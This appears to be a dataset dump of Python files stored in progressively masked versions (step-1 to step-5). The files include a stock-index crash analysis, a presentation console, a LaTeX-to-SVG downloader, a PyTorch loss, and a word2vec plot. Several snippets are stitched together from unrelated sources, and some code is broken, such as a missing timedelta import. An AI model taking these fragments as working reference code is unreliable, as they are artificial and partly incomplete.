"step-5": "import pandas as pd\nfrom datetime import datetime\nfrom iFinDPy import *\n\n\n\nthsLogin = THS_iFinDLogin(\"iFind账号\",\"iFind账号密码\")\n\n\nindex_list = ['000001.SH','399001.SZ','399006.SZ']\nresult = pd.DataFrame()\ntoday =datetime.today().strftime('%Y-%m-%d')\n\nfor index in index_list: \n data_js = THS_DateSerial(index,'ths_pre_close_index;ths_open_price_index;ths_close_price_index;ths_high_price_index',';;;',\\\n 'Days:Tradedays,Fill:Previous,Interval:D,block:history','2000-01-01',today,True)\n data_df = THS_Trans2DataFrame(data_js)\n data_df['close_chg'] = data_df['ths_close_price_index'] / data_df['ths_pre_close_index'] * 100 - 100\n result_pd = data_df[(data_df['close_chg'] < -5)]\n date_list = result_pd['time'].tolist()\n print('{}收盘在-5%的交易日有{}'.format(index,str(date_list)))\n for date in date_list:\n date_after_1month = THS_DateOffset('SSE','dateType:1,period:D,offset:30,dateFormat:0,output:singledate',date)['tables']['time'][0]\n date_after_3month = THS_DateOffset('SSE','dateType:1,period:D,offset:90,dateFormat:0,output:singledate',date)['tables']['time'][0]\n date_after_1year = THS_DateOffset('SSE','dateType:1,period:D,offset:365,dateFormat:0,output:singledate',date)['tables']['time'][0]\n if date > (datetime.today() + timedelta(days=-365)).strftime('%Y-%m-%d'):\n continue\n index_close_date = THS_BasicData(index,'ths_close_price_index',date)['tables'][0]['table']['ths_close_price_index'][0]\n index_close_date_after_1month = THS_BasicData(index,'ths_close_price_index',date_after_1month)['tables'][0]['table']['ths_close_price_index'][0]\n index_close_date_after_3month = THS_BasicData(index,'ths_close_price_index',date_after_3month)['tables'][0]['table']['ths_close_price_index'][0]\n index_close_date_after_1year = THS_BasicData(index,'ths_close_price_index',date_after_1year)['tables'][0]['table']['ths_close_price_index'][0]\n result = result.append(pd.DataFrame([index,date,index_close_date,index_close_date_after_1month,index_close_date_after_3month,index_close_date_after_1year]).T)\nresult.columns = ['指数代码','大跌日','大跌日点数','一个月后点数','三个月后点数','一年后点数']\nresult = result.set_index('指数代码')\nresult['大跌一个月后涨跌幅'] = result['一个月后点数']/result['大跌日点数'] *100 -100\nresult['大跌三个月后涨跌幅'] = result['三个月后点数']/result['大跌日点数'] *100 -100\nresult['大跌一年后涨跌幅'] = result['一年后点数']/result['大跌日点数'] *100 -100\nresult",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# 1.Create a list of 10 elements of four different data types like int, string, complex and float.
i=[1,2,3,4,5,6,7,8,9,10]
f=[10.5,12.2,13.7,14.9,14.9,18.8,19.7,23.6,90.9,25.7]
s=['Arpi','world','Hello','Python','Consultadd','job','c++','Concepts','interesting']
c=[1+2j,2+3j,4+5j,5+6j,56+7j,8+9j,7+8j,3+6j,7+9j]
print(c)
|
normal
|
{
"blob_id": "87d1c28819d187944a3cf99b35b1d41eab11b139",
"index": 6652,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(c)\n",
"step-3": "i = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nf = [10.5, 12.2, 13.7, 14.9, 14.9, 18.8, 19.7, 23.6, 90.9, 25.7]\ns = ['Arpi', 'world', 'Hello', 'Python', 'Consultadd', 'job', 'c++',\n 'Concepts', 'interesting']\nc = [1 + 2.0j, 2 + 3.0j, 4 + 5.0j, 5 + 6.0j, 56 + 7.0j, 8 + 9.0j, 7 + 8.0j,\n 3 + 6.0j, 7 + 9.0j]\nprint(c)\n",
"step-4": "# 1.Create a list of 10 elements of four different data types like int, string, complex and float.\n\ni=[1,2,3,4,5,6,7,8,9,10]\nf=[10.5,12.2,13.7,14.9,14.9,18.8,19.7,23.6,90.9,25.7]\ns=['Arpi','world','Hello','Python','Consultadd','job','c++','Concepts','interesting']\nc=[1+2j,2+3j,4+5j,5+6j,56+7j,8+9j,7+8j,3+6j,7+9j]\nprint(c)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# presentation console
# - a python interpreter for "pseudo-interative" demos
#
# usage: $ python prescons.py <filename>
#
# <filename> should be a file that contains python code as would be entered
# directly in a terminal - see example.py
#
# while running, press 'space' to move through the code
#
# github.com/inglesp/prescons
from code import InteractiveConsole
from StringIO import StringIO
import sys, termios, tty
# get character from stdin
# based on http://code.activestate.com/recipes/134892/
# *nix only, and doesn't handle arrow keys well
def getch(ch=None):
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
while True:
tty.setraw(fd)
gotch = sys.stdin.read(1)
if ch is None or gotch == ch:
break
if ord(gotch) == 3:
raise KeyboardInterrupt
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
# subclasses InteractiveConsole from code module
class PresentationConsole(InteractiveConsole):
def __init__(self, path):
self.file = open(path)
InteractiveConsole.__init__(self)
def raw_input(self, prompt=''):
self.write(prompt)
if prompt == sys.ps1:
try:
getch(' ')
except KeyboardInterrupt:
print "KeyboardInterrupt"
exec "import ipdb; ipdb.set_trace()" in self.locals
line = self.file.readline()
if len(line) == 0:
self.file.close()
raise EOFError
self.write(line)
return line.rstrip()
def runcode(self, code):
sys.stdout = StringIO()
InteractiveConsole.runcode(self, code)
output = sys.stdout.getvalue()
sys.stdout = sys.__stdout__
if len(output) > 0:
getch(' ')
self.write(output)
if __name__ == '__main__':
path = sys.argv[1]
console = PresentationConsole(path)
console.interact()
|
normal
|
{
"blob_id": "fa531e8b07de6ee3c22146904ee8724cefab9033",
"index": 2732,
"step-1": "# presentation console\n# - a python interpreter for \"pseudo-interative\" demos\n#\n# usage: $ python prescons.py <filename>\n#\n# <filename> should be a file that contains python code as would be entered\n# directly in a terminal - see example.py\n#\n# while running, press 'space' to move through the code\n#\n# github.com/inglesp/prescons\n\nfrom code import InteractiveConsole\nfrom StringIO import StringIO\nimport sys, termios, tty\n\n# get character from stdin\n# based on http://code.activestate.com/recipes/134892/\n# *nix only, and doesn't handle arrow keys well\ndef getch(ch=None):\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n while True:\n tty.setraw(fd)\n gotch = sys.stdin.read(1)\n if ch is None or gotch == ch:\n break\n if ord(gotch) == 3:\n raise KeyboardInterrupt\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n\n# subclasses InteractiveConsole from code module\nclass PresentationConsole(InteractiveConsole):\n def __init__(self, path):\n self.file = open(path)\n InteractiveConsole.__init__(self)\n\n def raw_input(self, prompt=''):\n self.write(prompt)\n if prompt == sys.ps1:\n try:\n getch(' ')\n except KeyboardInterrupt:\n print \"KeyboardInterrupt\"\n exec \"import ipdb; ipdb.set_trace()\" in self.locals\n line = self.file.readline()\n if len(line) == 0:\n self.file.close()\n raise EOFError\n self.write(line)\n return line.rstrip()\n\n def runcode(self, code):\n sys.stdout = StringIO()\n InteractiveConsole.runcode(self, code)\n output = sys.stdout.getvalue()\n sys.stdout = sys.__stdout__\n if len(output) > 0:\n getch(' ')\n self.write(output)\n\nif __name__ == '__main__':\n path = sys.argv[1]\n console = PresentationConsole(path)\n console.interact()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
def parseTex(lines: list):
new_lines = []
for i, line in enumerate(lines):
if line == '\n':
continue
inline = False
if line[0] == '$' and line[1] != '$':
inline = True
line = line.replace('$', '')
line = line.replace('\n', '')
line = line.replace(' ', '&space;')
line = line.replace('+', '+')
new_lines.append((line, inline))
return new_lines
def addColor(lines: list, color: str):
colortag = '{\\color[RGB]{' + color + '}'
return [('\\inline' + colortag + line[0] + '}' if line[1] else colortag +
line[0] + '}') for line in lines]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
imgs: list
config: dict
def parseTex(lines: list):
new_lines = []
for i, line in enumerate(lines):
if line == '\n':
continue
inline = False
if line[0] == '$' and line[1] != '$':
inline = True
line = line.replace('$', '')
line = line.replace('\n', '')
line = line.replace(' ', '&space;')
line = line.replace('+', '+')
new_lines.append((line, inline))
return new_lines
def addColor(lines: list, color: str):
colortag = '{\\color[RGB]{' + color + '}'
return [('\\inline' + colortag + line[0] + '}' if line[1] else colortag +
line[0] + '}') for line in lines]
if Path('config.toml').exists():
with open('config.toml', 'r') as loadconfig:
config = toml.load(loadconfig)
if config == {}:
config = {'colors': ['0, 0, 0'], 'outputs': ['']}
else:
config = {'colors': ['0, 0, 0'], 'outputs': ['']}
with open('tex.txt', 'r') as tex:
imgs = tex.readlines()
<|reserved_special_token_0|>
for i, color in enumerate(config['colors']):
coloredimgs = addColor(imgs, color)
output = 'output' / Path(config['outputs'][i])
if not output.exists():
output.mkdir()
for j, tex in enumerate(coloredimgs):
link = 'https://latex.codecogs.com/svg.latex?' + tex
print(link)
r = requests.get(link)
with open(output / ('latex' + str(j) + '.svg'), 'wb') as svg:
svg.write(r.content)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
imgs: list
config: dict
def parseTex(lines: list):
new_lines = []
for i, line in enumerate(lines):
if line == '\n':
continue
inline = False
if line[0] == '$' and line[1] != '$':
inline = True
line = line.replace('$', '')
line = line.replace('\n', '')
line = line.replace(' ', '&space;')
line = line.replace('+', '+')
new_lines.append((line, inline))
return new_lines
def addColor(lines: list, color: str):
colortag = '{\\color[RGB]{' + color + '}'
return [('\\inline' + colortag + line[0] + '}' if line[1] else colortag +
line[0] + '}') for line in lines]
if Path('config.toml').exists():
with open('config.toml', 'r') as loadconfig:
config = toml.load(loadconfig)
if config == {}:
config = {'colors': ['0, 0, 0'], 'outputs': ['']}
else:
config = {'colors': ['0, 0, 0'], 'outputs': ['']}
with open('tex.txt', 'r') as tex:
imgs = tex.readlines()
imgs = parseTex(imgs)
for i, color in enumerate(config['colors']):
coloredimgs = addColor(imgs, color)
output = 'output' / Path(config['outputs'][i])
if not output.exists():
output.mkdir()
for j, tex in enumerate(coloredimgs):
link = 'https://latex.codecogs.com/svg.latex?' + tex
print(link)
r = requests.get(link)
with open(output / ('latex' + str(j) + '.svg'), 'wb') as svg:
svg.write(r.content)
<|reserved_special_token_1|>
import requests
import toml
from pathlib import Path
imgs: list
config: dict
def parseTex(lines: list):
new_lines = []
for i, line in enumerate(lines):
if line == '\n':
continue
inline = False
if line[0] == '$' and line[1] != '$':
inline = True
line = line.replace('$', '')
line = line.replace('\n', '')
line = line.replace(' ', '&space;')
line = line.replace('+', '+')
new_lines.append((line, inline))
return new_lines
def addColor(lines: list, color: str):
colortag = '{\\color[RGB]{' + color + '}'
return [('\\inline' + colortag + line[0] + '}' if line[1] else colortag +
line[0] + '}') for line in lines]
if Path('config.toml').exists():
with open('config.toml', 'r') as loadconfig:
config = toml.load(loadconfig)
if config == {}:
config = {'colors': ['0, 0, 0'], 'outputs': ['']}
else:
config = {'colors': ['0, 0, 0'], 'outputs': ['']}
with open('tex.txt', 'r') as tex:
imgs = tex.readlines()
imgs = parseTex(imgs)
for i, color in enumerate(config['colors']):
coloredimgs = addColor(imgs, color)
output = 'output' / Path(config['outputs'][i])
if not output.exists():
output.mkdir()
for j, tex in enumerate(coloredimgs):
link = 'https://latex.codecogs.com/svg.latex?' + tex
print(link)
r = requests.get(link)
with open(output / ('latex' + str(j) + '.svg'), 'wb') as svg:
svg.write(r.content)
<|reserved_special_token_1|>
import requests
import toml
from pathlib import Path
imgs:list
config:dict
def parseTex(lines:list):
new_lines = []
for i, line in enumerate(lines):
if line == "\n":
continue
inline = False
if (line[0] == "$" and line[1] != "$"):
inline = True
line = line.replace("$", "")
line = line.replace("\n", "")
line = line.replace(" ", "&space;")
line = line.replace("+", "+")
new_lines.append((line, inline))
return new_lines
def addColor(lines:list, color:str):
colortag = "{\color[RGB]{" + color + "}"
return ["""\inline""" + colortag + line[0] + "}" if(line[1]) else colortag + line[0] + "}" for line in lines]
if Path("config.toml").exists():
with open("config.toml", "r") as loadconfig:
config = toml.load(loadconfig)
if config == {}:
config = {"colors": ["0, 0, 0"], "outputs": [""]}
else:
config = {"colors": ["0, 0, 0"], "outputs": [""]}
with open("tex.txt", "r") as tex:
imgs = tex.readlines()
imgs = parseTex(imgs) #returns a list of tuples, [0] is the parsed text, [1] is an inline boolean
for i, color in enumerate(config["colors"]):
coloredimgs = addColor(imgs, color)
output = "output" / Path(config["outputs"][i])
if (not output.exists()):
output.mkdir()
for j, tex in enumerate(coloredimgs):
link = "https://latex.codecogs.com/svg.latex?" + tex
print(link)
r = requests.get(link)
with open(output / ("latex" + str(j) + ".svg"), "wb") as svg:
svg.write(r.content)
|
flexible
|
{
"blob_id": "dbd04f7b88fa43ae920a6744e3979dbf917d3fc6",
"index": 7649,
"step-1": "<mask token>\n\n\ndef parseTex(lines: list):\n new_lines = []\n for i, line in enumerate(lines):\n if line == '\\n':\n continue\n inline = False\n if line[0] == '$' and line[1] != '$':\n inline = True\n line = line.replace('$', '')\n line = line.replace('\\n', '')\n line = line.replace(' ', '&space;')\n line = line.replace('+', '+')\n new_lines.append((line, inline))\n return new_lines\n\n\ndef addColor(lines: list, color: str):\n colortag = '{\\\\color[RGB]{' + color + '}'\n return [('\\\\inline' + colortag + line[0] + '}' if line[1] else colortag +\n line[0] + '}') for line in lines]\n\n\n<mask token>\n",
"step-2": "<mask token>\nimgs: list\nconfig: dict\n\n\ndef parseTex(lines: list):\n new_lines = []\n for i, line in enumerate(lines):\n if line == '\\n':\n continue\n inline = False\n if line[0] == '$' and line[1] != '$':\n inline = True\n line = line.replace('$', '')\n line = line.replace('\\n', '')\n line = line.replace(' ', '&space;')\n line = line.replace('+', '+')\n new_lines.append((line, inline))\n return new_lines\n\n\ndef addColor(lines: list, color: str):\n colortag = '{\\\\color[RGB]{' + color + '}'\n return [('\\\\inline' + colortag + line[0] + '}' if line[1] else colortag +\n line[0] + '}') for line in lines]\n\n\nif Path('config.toml').exists():\n with open('config.toml', 'r') as loadconfig:\n config = toml.load(loadconfig)\n if config == {}:\n config = {'colors': ['0, 0, 0'], 'outputs': ['']}\nelse:\n config = {'colors': ['0, 0, 0'], 'outputs': ['']}\nwith open('tex.txt', 'r') as tex:\n imgs = tex.readlines()\n<mask token>\nfor i, color in enumerate(config['colors']):\n coloredimgs = addColor(imgs, color)\n output = 'output' / Path(config['outputs'][i])\n if not output.exists():\n output.mkdir()\n for j, tex in enumerate(coloredimgs):\n link = 'https://latex.codecogs.com/svg.latex?' + tex\n print(link)\n r = requests.get(link)\n with open(output / ('latex' + str(j) + '.svg'), 'wb') as svg:\n svg.write(r.content)\n",
"step-3": "<mask token>\nimgs: list\nconfig: dict\n\n\ndef parseTex(lines: list):\n new_lines = []\n for i, line in enumerate(lines):\n if line == '\\n':\n continue\n inline = False\n if line[0] == '$' and line[1] != '$':\n inline = True\n line = line.replace('$', '')\n line = line.replace('\\n', '')\n line = line.replace(' ', '&space;')\n line = line.replace('+', '+')\n new_lines.append((line, inline))\n return new_lines\n\n\ndef addColor(lines: list, color: str):\n colortag = '{\\\\color[RGB]{' + color + '}'\n return [('\\\\inline' + colortag + line[0] + '}' if line[1] else colortag +\n line[0] + '}') for line in lines]\n\n\nif Path('config.toml').exists():\n with open('config.toml', 'r') as loadconfig:\n config = toml.load(loadconfig)\n if config == {}:\n config = {'colors': ['0, 0, 0'], 'outputs': ['']}\nelse:\n config = {'colors': ['0, 0, 0'], 'outputs': ['']}\nwith open('tex.txt', 'r') as tex:\n imgs = tex.readlines()\nimgs = parseTex(imgs)\nfor i, color in enumerate(config['colors']):\n coloredimgs = addColor(imgs, color)\n output = 'output' / Path(config['outputs'][i])\n if not output.exists():\n output.mkdir()\n for j, tex in enumerate(coloredimgs):\n link = 'https://latex.codecogs.com/svg.latex?' + tex\n print(link)\n r = requests.get(link)\n with open(output / ('latex' + str(j) + '.svg'), 'wb') as svg:\n svg.write(r.content)\n",
"step-4": "import requests\nimport toml\nfrom pathlib import Path\nimgs: list\nconfig: dict\n\n\ndef parseTex(lines: list):\n new_lines = []\n for i, line in enumerate(lines):\n if line == '\\n':\n continue\n inline = False\n if line[0] == '$' and line[1] != '$':\n inline = True\n line = line.replace('$', '')\n line = line.replace('\\n', '')\n line = line.replace(' ', '&space;')\n line = line.replace('+', '+')\n new_lines.append((line, inline))\n return new_lines\n\n\ndef addColor(lines: list, color: str):\n colortag = '{\\\\color[RGB]{' + color + '}'\n return [('\\\\inline' + colortag + line[0] + '}' if line[1] else colortag +\n line[0] + '}') for line in lines]\n\n\nif Path('config.toml').exists():\n with open('config.toml', 'r') as loadconfig:\n config = toml.load(loadconfig)\n if config == {}:\n config = {'colors': ['0, 0, 0'], 'outputs': ['']}\nelse:\n config = {'colors': ['0, 0, 0'], 'outputs': ['']}\nwith open('tex.txt', 'r') as tex:\n imgs = tex.readlines()\nimgs = parseTex(imgs)\nfor i, color in enumerate(config['colors']):\n coloredimgs = addColor(imgs, color)\n output = 'output' / Path(config['outputs'][i])\n if not output.exists():\n output.mkdir()\n for j, tex in enumerate(coloredimgs):\n link = 'https://latex.codecogs.com/svg.latex?' + tex\n print(link)\n r = requests.get(link)\n with open(output / ('latex' + str(j) + '.svg'), 'wb') as svg:\n svg.write(r.content)\n",
"step-5": "import requests\nimport toml\nfrom pathlib import Path\n\nimgs:list\nconfig:dict\n\ndef parseTex(lines:list):\n new_lines = []\n for i, line in enumerate(lines):\n if line == \"\\n\":\n continue\n\n inline = False\n if (line[0] == \"$\" and line[1] != \"$\"):\n inline = True\n line = line.replace(\"$\", \"\")\n line = line.replace(\"\\n\", \"\")\n line = line.replace(\" \", \"&space;\")\n line = line.replace(\"+\", \"+\")\n new_lines.append((line, inline))\n return new_lines\n\ndef addColor(lines:list, color:str):\n colortag = \"{\\color[RGB]{\" + color + \"}\"\n return [\"\"\"\\inline\"\"\" + colortag + line[0] + \"}\" if(line[1]) else colortag + line[0] + \"}\" for line in lines]\n\n\n\n\nif Path(\"config.toml\").exists():\n with open(\"config.toml\", \"r\") as loadconfig:\n config = toml.load(loadconfig)\n if config == {}:\n config = {\"colors\": [\"0, 0, 0\"], \"outputs\": [\"\"]}\nelse:\n config = {\"colors\": [\"0, 0, 0\"], \"outputs\": [\"\"]}\n\nwith open(\"tex.txt\", \"r\") as tex:\n imgs = tex.readlines()\n\nimgs = parseTex(imgs) #returns a list of tuples, [0] is the parsed text, [1] is an inline boolean\nfor i, color in enumerate(config[\"colors\"]):\n coloredimgs = addColor(imgs, color)\n output = \"output\" / Path(config[\"outputs\"][i])\n if (not output.exists()):\n output.mkdir()\n for j, tex in enumerate(coloredimgs):\n link = \"https://latex.codecogs.com/svg.latex?\" + tex\n print(link)\n r = requests.get(link)\n with open(output / (\"latex\" + str(j) + \".svg\"), \"wb\") as svg:\n svg.write(r.content)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class Custom_Loss_for_Autoencoder(nn.Module):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Custom_Loss_for_Autoencoder(nn.Module):
<|reserved_special_token_0|>
def forward(self, reconstructed_images, images):
l1 = self.mse(reconstructed_images, images)
l2 = self.ssim(reconstructed_images, images)
return l1 - l2
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Custom_Loss_for_Autoencoder(nn.Module):
def __init__(self, window_size=6):
super(Custom_Loss_for_Autoencoder, self).__init__()
self.ssim = pytorch_ssim.SSIM(window_size=window_size)
self.mse = nn.MSELoss()
def forward(self, reconstructed_images, images):
l1 = self.mse(reconstructed_images, images)
l2 = self.ssim(reconstructed_images, images)
return l1 - l2
<|reserved_special_token_1|>
import torch
from torch import nn
import pytorch_ssim
class Custom_Loss_for_Autoencoder(nn.Module):
def __init__(self, window_size=6):
super(Custom_Loss_for_Autoencoder, self).__init__()
self.ssim = pytorch_ssim.SSIM(window_size=window_size)
self.mse = nn.MSELoss()
def forward(self, reconstructed_images, images):
l1 = self.mse(reconstructed_images, images)
l2 = self.ssim(reconstructed_images, images)
return l1 - l2
|
flexible
|
{
"blob_id": "ce3e2aa2534bb404b45202bcb76e9d07080560cb",
"index": 2739,
"step-1": "<mask token>\n\n\nclass Custom_Loss_for_Autoencoder(nn.Module):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Custom_Loss_for_Autoencoder(nn.Module):\n <mask token>\n\n def forward(self, reconstructed_images, images):\n l1 = self.mse(reconstructed_images, images)\n l2 = self.ssim(reconstructed_images, images)\n return l1 - l2\n",
"step-3": "<mask token>\n\n\nclass Custom_Loss_for_Autoencoder(nn.Module):\n\n def __init__(self, window_size=6):\n super(Custom_Loss_for_Autoencoder, self).__init__()\n self.ssim = pytorch_ssim.SSIM(window_size=window_size)\n self.mse = nn.MSELoss()\n\n def forward(self, reconstructed_images, images):\n l1 = self.mse(reconstructed_images, images)\n l2 = self.ssim(reconstructed_images, images)\n return l1 - l2\n",
"step-4": "import torch\nfrom torch import nn\nimport pytorch_ssim\n\n\nclass Custom_Loss_for_Autoencoder(nn.Module):\n\n def __init__(self, window_size=6):\n super(Custom_Loss_for_Autoencoder, self).__init__()\n self.ssim = pytorch_ssim.SSIM(window_size=window_size)\n self.mse = nn.MSELoss()\n\n def forward(self, reconstructed_images, images):\n l1 = self.mse(reconstructed_images, images)\n l2 = self.ssim(reconstructed_images, images)\n return l1 - l2\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_Count_By_distance(centers, pixel_use, d):
d_min = 1
d_b = d
count_use = 0
for i in range(len(centers)):
d = attenuation(centers[i], pixel_use)
if d < d_min:
d_min = d
count_use = i
if d_min < d_b:
count = count_use
else:
count = -1
return count
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def attenuation(color, last_mean):
return 1 - math.exp((distance(color, last_mean) / 80) ** 2 * -1)
def get_Count_By_distance(centers, pixel_use, d):
d_min = 1
d_b = d
count_use = 0
for i in range(len(centers)):
d = attenuation(centers[i], pixel_use)
if d < d_min:
d_min = d
count_use = i
if d_min < d_b:
count = count_use
else:
count = -1
return count
<|reserved_special_token_1|>
import math
from utils.util import distance
def attenuation(color, last_mean):
return 1 - math.exp((distance(color, last_mean) / 80) ** 2 * -1)
def get_Count_By_distance(centers, pixel_use, d):
d_min = 1
d_b = d
count_use = 0
for i in range(len(centers)):
d = attenuation(centers[i], pixel_use)
if d < d_min:
d_min = d
count_use = i
if d_min < d_b:
count = count_use
else:
count = -1
return count
<|reserved_special_token_1|>
import math
# 计算像素点属于哪个中心点
from utils.util import distance
def attenuation(color, last_mean):
return 1 - math.exp(((distance(color, last_mean) / 80) ** 2) * -1)
def get_Count_By_distance(centers, pixel_use,d):
# d_min设置过低会产生多的中心点,许多很相似但是没有归到一类中
# d_min设置过高产生少的中心点,不相似的归到一类中
d_min = 1;
d_b = d;
count_use = 0;
for i in range(len(centers)):
d = attenuation(centers[i], pixel_use);
if d < d_min:
d_min = d;
count_use = i;
if d_min < d_b:
count = count_use;
else:
count = -1;
return count;
|
flexible
|
{
"blob_id": "918db455fc50b49ca2b40dd78cecdec4ba08dcb8",
"index": 6013,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_Count_By_distance(centers, pixel_use, d):\n d_min = 1\n d_b = d\n count_use = 0\n for i in range(len(centers)):\n d = attenuation(centers[i], pixel_use)\n if d < d_min:\n d_min = d\n count_use = i\n if d_min < d_b:\n count = count_use\n else:\n count = -1\n return count\n",
"step-3": "<mask token>\n\n\ndef attenuation(color, last_mean):\n return 1 - math.exp((distance(color, last_mean) / 80) ** 2 * -1)\n\n\ndef get_Count_By_distance(centers, pixel_use, d):\n d_min = 1\n d_b = d\n count_use = 0\n for i in range(len(centers)):\n d = attenuation(centers[i], pixel_use)\n if d < d_min:\n d_min = d\n count_use = i\n if d_min < d_b:\n count = count_use\n else:\n count = -1\n return count\n",
"step-4": "import math\nfrom utils.util import distance\n\n\ndef attenuation(color, last_mean):\n return 1 - math.exp((distance(color, last_mean) / 80) ** 2 * -1)\n\n\ndef get_Count_By_distance(centers, pixel_use, d):\n d_min = 1\n d_b = d\n count_use = 0\n for i in range(len(centers)):\n d = attenuation(centers[i], pixel_use)\n if d < d_min:\n d_min = d\n count_use = i\n if d_min < d_b:\n count = count_use\n else:\n count = -1\n return count\n",
"step-5": "import math\n\n# 计算像素点属于哪个中心点\nfrom utils.util import distance\n\n\ndef attenuation(color, last_mean):\n return 1 - math.exp(((distance(color, last_mean) / 80) ** 2) * -1)\ndef get_Count_By_distance(centers, pixel_use,d):\n\n # d_min设置过低会产生多的中心点,许多很相似但是没有归到一类中\n # d_min设置过高产生少的中心点,不相似的归到一类中\n d_min = 1;\n d_b = d;\n count_use = 0;\n for i in range(len(centers)):\n\n d = attenuation(centers[i], pixel_use);\n if d < d_min:\n d_min = d;\n count_use = i;\n\n if d_min < d_b:\n count = count_use;\n else:\n count = -1;\n return count;\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python
# coding=utf-8
from django.core.management.base import BaseCommand
from BanBanTong.utils import task_scheduler
class Command(BaseCommand):
'''
启动BanBanTong.tasks定时任务
'''
def handle(self, *args, **options):
task_scheduler.start()
|
normal
|
{
"blob_id": "e9c81be79d9107433e00182c27488e64f1ca779f",
"index": 1458,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Command(BaseCommand):\n <mask token>\n\n def handle(self, *args, **options):\n task_scheduler.start()\n",
"step-3": "<mask token>\n\n\nclass Command(BaseCommand):\n \"\"\"\n 启动BanBanTong.tasks定时任务\n \"\"\"\n\n def handle(self, *args, **options):\n task_scheduler.start()\n",
"step-4": "from django.core.management.base import BaseCommand\nfrom BanBanTong.utils import task_scheduler\n\n\nclass Command(BaseCommand):\n \"\"\"\n 启动BanBanTong.tasks定时任务\n \"\"\"\n\n def handle(self, *args, **options):\n task_scheduler.start()\n",
"step-5": "#!/usr/bin/env python\n# coding=utf-8\nfrom django.core.management.base import BaseCommand\nfrom BanBanTong.utils import task_scheduler\n\n\nclass Command(BaseCommand):\n '''\n 启动BanBanTong.tasks定时任务\n '''\n\n def handle(self, *args, **options):\n task_scheduler.start()\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
# coding: utf-8
import re
import numpy as np
from sklearn.manifold import TSNE
import word2vec
from matplotlib import pyplot as plt
from adjustText import adjust_text
import nltk
'''
word2vec.word2phrase('all.txt', 'phrases.txt', verbose=True)
word2vec.word2vec('phrases.txt', 'text.bin', size=100, verbose=True)
word2vec.word2clusters('all.txt', 'clusters.txt', 100, verbose=True)
'''
model = word2vec.load('text.bin')
words = [word for word in model.vocab[:500]]
X = [ model[word] for word in words]
X = np.array(X)
tsne = TSNE(n_components=2)
X_tsne = tsne.fit_transform(X)
def plot_scatter(x,y,texts,adjust=False):
fig, ax = plt.subplots()
ax.plot(x, y, 'bo')
texts = [plt.text(x[i], y[i], texts[i]) for i in range(len(x))]
if adjust:
plt.title(str( adjust_text(texts, x, y, arrowprops=dict(arrowstyle='->', color='red')))+' iterations')
plt.savefig("500")
pattern = re.compile(r"[,.:;!?“”’]")
X, Y, texts = [], [], []
for i,word in enumerate(words):
if not pattern.findall(word):
tag = nltk.pos_tag([word])
if tag[0][1] != 'JJ' and tag[0][1] != 'NNP' and tag[0][1] != 'NN' and tag[0][1] != 'NNS':
continue
X.append(X_tsne[i][0])
Y.append(X_tsne[i][1])
texts.append(word)
print(len(X))
plot_scatter(X, Y, texts, True)
|
normal
|
{
"blob_id": "31996699bec6507d941eb8a7aaacffbd6248d79c",
"index": 7112,
"step-1": "<mask token>\n\n\ndef plot_scatter(x, y, texts, adjust=False):\n fig, ax = plt.subplots()\n ax.plot(x, y, 'bo')\n texts = [plt.text(x[i], y[i], texts[i]) for i in range(len(x))]\n if adjust:\n plt.title(str(adjust_text(texts, x, y, arrowprops=dict(arrowstyle=\n '->', color='red'))) + ' iterations')\n plt.savefig('500')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef plot_scatter(x, y, texts, adjust=False):\n fig, ax = plt.subplots()\n ax.plot(x, y, 'bo')\n texts = [plt.text(x[i], y[i], texts[i]) for i in range(len(x))]\n if adjust:\n plt.title(str(adjust_text(texts, x, y, arrowprops=dict(arrowstyle=\n '->', color='red'))) + ' iterations')\n plt.savefig('500')\n\n\n<mask token>\nfor i, word in enumerate(words):\n if not pattern.findall(word):\n tag = nltk.pos_tag([word])\n if tag[0][1] != 'JJ' and tag[0][1] != 'NNP' and tag[0][1\n ] != 'NN' and tag[0][1] != 'NNS':\n continue\n X.append(X_tsne[i][0])\n Y.append(X_tsne[i][1])\n texts.append(word)\nprint(len(X))\nplot_scatter(X, Y, texts, True)\n",
